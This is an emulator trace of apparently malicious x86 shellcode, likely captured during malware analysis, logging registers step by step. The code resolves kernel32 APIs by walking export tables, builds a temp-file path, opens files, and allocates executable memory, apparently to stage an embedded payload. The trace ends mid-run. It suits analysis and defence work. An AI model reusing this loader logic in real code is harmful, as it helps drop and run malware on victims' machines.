0x091C0625:: AD lodsd dword ptr [esi]
eax = 251fd0 ebx = 7c802654 ecx = d edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0626 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0626:: 8B 68 08 mov ebp, dword ptr [eax+0x8]
eax = 251fd0 ebx = 7c802654 ecx = d edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0629 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0629:: 8B 45 3C mov eax, dword ptr [ebp+0x3c]
eax = f0 ebx = 7c802654 ecx = d edx = 7c80262c esi = 251f2c edi = 0
eip = 91c062c esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C062C:: 8B 54 05 78 mov edx, dword ptr [ebp+eax*1+0x78]
eax = f0 ebx = 7c802654 ecx = d edx = 262c esi = 251f2c edi = 0
eip = 91c0630 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0630:: 03 D5 add edx, ebp
eax = f0 ebx = 7c802654 ecx = d edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0632 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0632:: 8B 5A 20 mov ebx, dword ptr [edx+0x20]
eax = f0 ebx = 3538 ecx = d edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0635 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0635:: 03 DD add ebx, ebp
eax = f0 ebx = 7c803538 ecx = d edx = 7c80262c esi = 251f2c edi = 0
eip = 91c0637 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0637:: 47 inc edi
eax = f0 ebx = 7c803538 ecx = d edx = 7c80262c esi = 251f2c edi = 1
eip = 91c0638 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0638:: 8B 34 BB mov esi, dword ptr [ebx+edi*4]
eax = f0 ebx = 7c803538 ecx = d edx = 7c80262c esi = 4baa edi = 1
eip = 91c063b esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C063B:: 03 F5 add esi, ebp
eax = f0 ebx = 7c803538 ecx = d edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c063d esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C063D:: 33 C9 xor ecx, ecx
eax = f0 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c063f esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C063F:: 0F BE 06 movsx eax, byte ptr [esi]
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c0642 esp = 12cbe0 ebp = 7c800000 eflags = 200246
0x091C0642:: 3A C4 cmp al, ah
eax = 41 ebx = 7c803538 ecx = 0 edx = 7c80262c esi = 7c804baa edi = 1
eip = 91c0644 esp = 12cbe0 ebp = 7c800000 eflags = 200206
0x091C0644:: 74 08 jz 0x91c064e
eax = 7c801e1a ebx = 7c802654 ecx = 0 edx = 7c80262c esi = 7c80890a edi = 91c08a2
eip = 91c066d esp = 12cbe8 ebp = 7c800000 eflags = 200202
0x091C066D:: 8B F7 mov esi, edi
eax = 7c801e1a ebx = 7c802654 ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c08a2
eip = 91c066f esp = 12cbe8 ebp = 7c800000 eflags = 200202
0x091C066F:: 8B 7C 24 04 mov edi, dword ptr [esp+0x4]
eax = 7c801e1a ebx = 7c802654 ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c086a
eip = 91c0673 esp = 12cbe8 ebp = 7c800000 eflags = 200202
0x091C0673:: 56 push esi
eax = 7c801e1a ebx = 7c802654 ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c086a
eip = 91c0674 esp = 12cbe4 ebp = 7c800000 eflags = 200202
0x091C0674:: 57 push edi
eax = 7c801e1a ebx = 7c802654 ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c086a
eip = 91c0675 esp = 12cbe0 ebp = 7c800000 eflags = 200202
0x091C0675:: 8B EC mov ebp, esp
eax = 7c801e1a ebx = 7c802654 ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c086a
eip = 91c0677 esp = 12cbe0 ebp = 12cbe0 eflags = 200202
0x091C0677:: 81 EC 50 03 00 00 sub esp, 0x350
eax = 7c801e1a ebx = 7c802654 ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c086a
eip = 91c067d esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C067D:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 7c801e1a ebx = 91c086a ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c086a
eip = 91c0680 esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C0680:: FF 13 call dword ptr [ebx]
eax = 152310 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 91c08a2 edi = 91c086a
eip = 91c0682 esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C0682:: 8B F0 mov esi, eax
eax = 152310 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152310 edi = 91c086a
eip = 91c0684 esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C0684:: 32 C9 xor cl, cl
eax = 152310 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152310 edi = 91c086a
eip = 91c0686 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0686:: 46 inc esi
eax = 152310 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152311 edi = 91c086a
eip = 91c0687 esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C0687:: AC lodsb byte ptr [esi]
eax = 152363 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152312 edi = 91c086a
eip = 91c0688 esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C0688:: 3C 22 cmp al, 0x22
eax = 152363 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152312 edi = 91c086a
eip = 91c068a esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C068A:: 75 FB jnz 0x91c0687
eax = 152363 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152312 edi = 91c086a
eip = 91c0687 esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C0687:: AC lodsb byte ptr [esi]
eax = 15233a ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152313 edi = 91c086a
eip = 91c0688 esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C0688:: 3C 22 cmp al, 0x22
eax = 15233a ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152313 edi = 91c086a
eip = 91c068a esp = 12c890 ebp = 12cbe0 eflags = 200206
0x091C068A:: 75 FB jnz 0x91c0687
eax = 152322 ebx = 91c086a ecx = 0 edx = 7c80262c esi = 152347 edi = 91c086a
eip = 91c068c esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C068C:: FE C1 inc cl
eax = 152322 ebx = 91c086a ecx = 1 edx = 7c80262c esi = 152347 edi = 91c086a
eip = 91c068e esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C068E:: 80 F9 02 cmp cl, 0x2
eax = 152322 ebx = 91c086a ecx = 1 edx = 7c80262c esi = 152347 edi = 91c086a
eip = 91c0691 esp = 12c890 ebp = 12cbe0 eflags = 200297
0x091C0691:: 75 F4 jnz 0x91c0687
eax = 152322 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152349 edi = 91c086a
eip = 91c0693 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0693:: 56 push esi
eax = 152322 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152349 edi = 91c086a
eip = 91c0694 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0694:: AC lodsb byte ptr [esi]
eax = 152363 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 15234a edi = 91c086a
eip = 91c0695 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0695:: 3C 22 cmp al, 0x22
eax = 152363 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 15234a edi = 91c086a
eip = 91c0697 esp = 12c88c ebp = 12cbe0 eflags = 200206
0x091C0697:: 75 FB jnz 0x91c0694
eax = 152363 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 15234a edi = 91c086a
eip = 91c0694 esp = 12c88c ebp = 12cbe0 eflags = 200206
0x091C0694:: AC lodsb byte ptr [esi]
eax = 15233a ebx = 91c086a ecx = 2 edx = 7c80262c esi = 15234b edi = 91c086a
eip = 91c0695 esp = 12c88c ebp = 12cbe0 eflags = 200206
0x091C0695:: 3C 22 cmp al, 0x22
eax = 15233a ebx = 91c086a ecx = 2 edx = 7c80262c esi = 15234b edi = 91c086a
eip = 91c0697 esp = 12c88c ebp = 12cbe0 eflags = 200206
0x091C0697:: 75 FB jnz 0x91c0694
eax = 152322 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152375 edi = 91c086a
eip = 91c0699 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0699:: 4E dec esi
eax = 152322 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152374 edi = 91c086a
eip = 91c069a esp = 12c88c ebp = 12cbe0 eflags = 200206
0x091C069A:: 33 C0 xor eax, eax
eax = 0 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152374 edi = 91c086a
eip = 91c069c esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C069C:: 89 06 mov dword ptr [esi], eax
eax = 0 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152374 edi = 91c086a
eip = 91c069e esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C069E:: 8D BD B0 FC FF FF lea edi, ptr [ebp-0x350]
eax = 0 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152374 edi = 12c890
eip = 91c06a4 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C06A4:: 57 push edi
eax = 0 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152374 edi = 12c890
eip = 91c06a5 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C06A5:: 68 04 01 00 00 push 0x104
eax = 0 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152374 edi = 12c890
eip = 91c06aa esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C06AA:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 2 edx = 7c80262c esi = 152374 edi = 12c890
eip = 91c06ad esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C06AD:: FF 53 04 call dword ptr [ebx+0x4]
eax = 23 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 152374 edi = 12c890
eip = 91c06b0 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C06B0:: 89 45 FC mov dword ptr [ebp-0x4], eax
eax = 23 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 152374 edi = 12c890
eip = 91c06b3 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C06B3:: 8B 75 04 mov esi, dword ptr [ebp+0x4]
eax = 23 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a2 edi = 12c890
eip = 91c06b6 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C06B6:: 57 push edi
eax = 23 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a2 edi = 12c890
eip = 91c06b7 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C06B7:: 03 F8 add edi, eax
eax = 23 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a2 edi = 12c8b3
eip = 91c06b9 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C06B9:: AC lodsb byte ptr [esi]
eax = 31 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a3 edi = 12c8b3
eip = 91c06ba esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C06BA:: AA stosb byte ptr [edi]
eax = 31 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a3 edi = 12c8b4
eip = 91c06bb esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C06BB:: 3C 00 cmp al, 0x0
eax = 31 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a3 edi = 12c8b4
eip = 91c06bd esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C06BD:: 75 FA jnz 0x91c06b9
eax = 31 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a3 edi = 12c8b4
eip = 91c06b9 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C06B9:: AC lodsb byte ptr [esi]
eax = 2e ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a4 edi = 12c8b4
eip = 91c06ba esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C06BA:: AA stosb byte ptr [edi]
eax = 2e ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a4 edi = 12c8b5
eip = 91c06bb esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C06BB:: 3C 00 cmp al, 0x0
eax = 2e ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a4 edi = 12c8b5
eip = 91c06bd esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C06BD:: 75 FA jnz 0x91c06b9
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a8 edi = 12c8b9
eip = 91c06bf esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C06BF:: 89 75 F4 mov dword ptr [ebp-0xc], esi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a8 edi = 12c8b9
eip = 91c06c2 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C06C2:: 5F pop edi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 91c08a8 edi = 12c890
eip = 91c06c3 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C06C3:: 5E pop esi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 152349 edi = 12c890
eip = 91c06c4 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C06C4:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 152349 edi = 12c890
eip = 91c06c6 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C06C6:: 57 push edi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 152349 edi = 12c890
eip = 91c06c7 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C06C7:: 56 push esi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 152349 edi = 12c890
eip = 91c06c8 esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C06C8:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 80000 esi = 152349 edi = 12c890
eip = 91c06cb esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C06CB:: FF 53 08 call dword ptr [ebx+0x8]
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06ce esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C06CE:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06d0 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C06D0:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06d2 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C06D2:: 6A 04 push 0x4
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06d4 esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C06D4:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06d6 esp = 12c880 ebp = 12cbe0 eflags = 200246
0x091C06D6:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06d8 esp = 12c87c ebp = 12cbe0 eflags = 200246
0x091C06D8:: 68 00 00 00 C0 push 0xc0000000
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06dd esp = 12c878 ebp = 12cbe0 eflags = 200246
0x091C06DD:: 57 push edi
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06de esp = 12c874 ebp = 12cbe0 eflags = 200246
0x091C06DE:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 7c93003d edx = 100000 esi = 152349 edi = 12c890
eip = 91c06e1 esp = 12c874 ebp = 12cbe0 eflags = 200246
0x091C06E1:: FF 53 0C call dword ptr [ebx+0xc]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 152349 edi = 12c890
eip = 91c06e4 esp = 12c890 ebp = 12cbe0 eflags = 200286
0x091C06E4:: 89 45 F8 mov dword ptr [ebp-0x8], eax
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 152349 edi = 12c890
eip = 91c06e7 esp = 12c890 ebp = 12cbe0 eflags = 200286
0x091C06E7:: 8B 75 F4 mov esi, dword ptr [ebp-0xc]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08a8 edi = 12c890
eip = 91c06ea esp = 12c890 ebp = 12cbe0 eflags = 200286
0x091C06EA:: AD lodsd dword ptr [esi]
eax = df8 ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06eb esp = 12c890 ebp = 12cbe0 eflags = 200286
0x091C06EB:: 89 75 F4 mov dword ptr [ebp-0xc], esi
eax = df8 ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06ee esp = 12c890 ebp = 12cbe0 eflags = 200286
0x091C06EE:: 6A 00 push 0x0
eax = df8 ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06f0 esp = 12c88c ebp = 12cbe0 eflags = 200286
0x091C06F0:: 6A 00 push 0x0
eax = df8 ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06f2 esp = 12c888 ebp = 12cbe0 eflags = 200286
0x091C06F2:: 50 push eax
eax = df8 ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06f3 esp = 12c884 ebp = 12cbe0 eflags = 200286
0x091C06F3:: 8B 45 F8 mov eax, dword ptr [ebp-0x8]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06f6 esp = 12c884 ebp = 12cbe0 eflags = 200286
0x091C06F6:: 50 push eax
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06f7 esp = 12c880 ebp = 12cbe0 eflags = 200286
0x091C06F7:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 15 esi = 91c08ac edi = 12c890
eip = 91c06fa esp = 12c880 ebp = 12cbe0 eflags = 200286
0x091C06FA:: FF 53 14 call dword ptr [ebx+0x14]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08ac edi = 12c890
eip = 91c06fd esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C06FD:: 8B 75 F4 mov esi, dword ptr [ebp-0xc]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08ac edi = 12c890
eip = 91c0700 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0700:: 56 push esi
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08ac edi = 12c890
eip = 91c0701 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0701:: AD lodsd dword ptr [esi]
eax = 282be ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0702 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0702:: 89 75 F4 mov dword ptr [ebp-0xc], esi
eax = 282be ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0705 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0705:: 6A 40 push 0x40
eax = 282be ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0707 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0707:: 68 00 10 00 00 push 0x1000
eax = 282be ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c070c esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C070C:: 50 push eax
eax = 282be ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c070d esp = 12c880 ebp = 12cbe0 eflags = 200246
0x091C070D:: 6A 00 push 0x0
eax = 282be ebx = 91c086a ecx = 7c92f641 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c070f esp = 12c87c ebp = 12cbe0 eflags = 200246
0x091C070F:: FF 53 10 call dword ptr [ebx+0x10]
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08b0 edi = 12c890
eip = 91c0712 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0712:: 89 45 F0 mov dword ptr [ebp-0x10], eax
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08b0 edi = 12c890
eip = 91c0715 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0715:: 5E pop esi
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c0716 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0716:: 6A 00 push 0x0
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c0718 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0718:: 56 push esi
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c0719 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0719:: FF 36 push dword ptr [esi]
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c071b esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C071B:: 50 push eax
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c071c esp = 12c880 ebp = 12cbe0 eflags = 200246
0x091C071C:: 8B 5D F8 mov ebx, dword ptr [ebp-0x8]
eax = 9430000 ebx = ffffffff ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c071f esp = 12c880 ebp = 12cbe0 eflags = 200246
0x091C071F:: 53 push ebx
eax = 9430000 ebx = ffffffff ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c0720 esp = 12c87c ebp = 12cbe0 eflags = 200246
0x091C0720:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 9430000 ebx = 91c086a ecx = 7c809b49 edx = 12c80c esi = 91c08ac edi = 12c890
eip = 91c0723 esp = 12c87c ebp = 12cbe0 eflags = 200246
0x091C0723:: FF 53 18 call dword ptr [ebx+0x18]
eax = 0 ebx = 91c086a ecx = 7c80189c edx = 17 esi = 91c08ac edi = 12c890
eip = 91c0726 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0726:: AD lodsd dword ptr [esi]
eax = 0 ebx = 91c086a ecx = 7c80189c edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0727 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0727:: 33 C9 xor ecx, ecx
eax = 0 ebx = 91c086a ecx = 0 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0729 esp = 12c890 ebp = 12cbe0 eflags = 200246
0x091C0729:: 41 inc ecx
eax = 0 ebx = 91c086a ecx = 1 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c072a esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C072A:: 41 inc ecx
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c072b esp = 12c890 ebp = 12cbe0 eflags = 200202
0x091C072B:: 51 push ecx
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c072c esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C072C:: 8D BD B0 FC FF FF lea edi, ptr [ebp-0x350]
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0732 esp = 12c88c ebp = 12cbe0 eflags = 200202
0x091C0732:: 57 push edi
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0733 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0733:: 8B 45 FC mov eax, dword ptr [ebp-0x4]
eax = 23 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b0 edi = 12c890
eip = 91c0736 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0736:: 03 F8 add edi, eax
eax = 23 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b0 edi = 12c8b3
eip = 91c0738 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0738:: AC lodsb byte ptr [esi]
eax = 6a ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b1 edi = 12c8b3
eip = 91c0739 esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C0739:: AA stosb byte ptr [edi]
eax = 6a ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b1 edi = 12c8b4
eip = 91c073a esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C073A:: 3C 00 cmp al, 0x0
eax = 6a ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b1 edi = 12c8b4
eip = 91c073c esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C073C:: 75 FA jnz 0x91c0738
eax = 6a ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b1 edi = 12c8b4
eip = 91c0738 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C0738:: AC lodsb byte ptr [esi]
eax = 61 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b2 edi = 12c8b4
eip = 91c0739 esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C0739:: AA stosb byte ptr [edi]
eax = 61 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b2 edi = 12c8b5
eip = 91c073a esp = 12c888 ebp = 12cbe0 eflags = 200206
0x091C073A:: 3C 00 cmp al, 0x0
eax = 61 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08b2 edi = 12c8b5
eip = 91c073c esp = 12c888 ebp = 12cbe0 eflags = 200202
0x091C073C:: 75 FA jnz 0x91c0738
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c8bf
eip = 91c073e esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C073E:: 5F pop edi
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c073f esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C073F:: 89 75 F4 mov dword ptr [ebp-0xc], esi
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c0742 esp = 12c88c ebp = 12cbe0 eflags = 200246
0x091C0742:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c0744 esp = 12c888 ebp = 12cbe0 eflags = 200246
0x091C0744:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c0746 esp = 12c884 ebp = 12cbe0 eflags = 200246
0x091C0746:: 6A 01 push 0x1
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c0748 esp = 12c880 ebp = 12cbe0 eflags = 200246
0x091C0748:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c074a esp = 12c87c ebp = 12cbe0 eflags = 200246
0x091C074A:: 6A 00 push 0x0
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c074c esp = 12c878 ebp = 12cbe0 eflags = 200246
0x091C074C:: 68 00 00 00 C0 push 0xc0000000
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c0751 esp = 12c874 ebp = 12cbe0 eflags = 200246
0x091C0751:: 57 push edi
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c0752 esp = 12c870 ebp = 12cbe0 eflags = 200246
0x091C0752:: 8B 5D 00 mov ebx, dword ptr [ebp]
eax = 0 ebx = 91c086a ecx = 2 edx = 17 esi = 91c08bc edi = 12c890
eip = 91c0755 esp = 12c870 ebp = 12cbe0 eflags = 200246
0x091C0755:: FF 53 0C call dword ptr [ebx+0xc]
eax = ffffffff ebx = 91c086a ecx = 7c92f641 edx = 3 esi = 91c08bc edi = 12c890
eip = 91c0758 esp = 12c88c ebp = 12cbe0 eflags = 200286
0x091C0758:: 83 F8 FF cmp eax, 0xffffffff
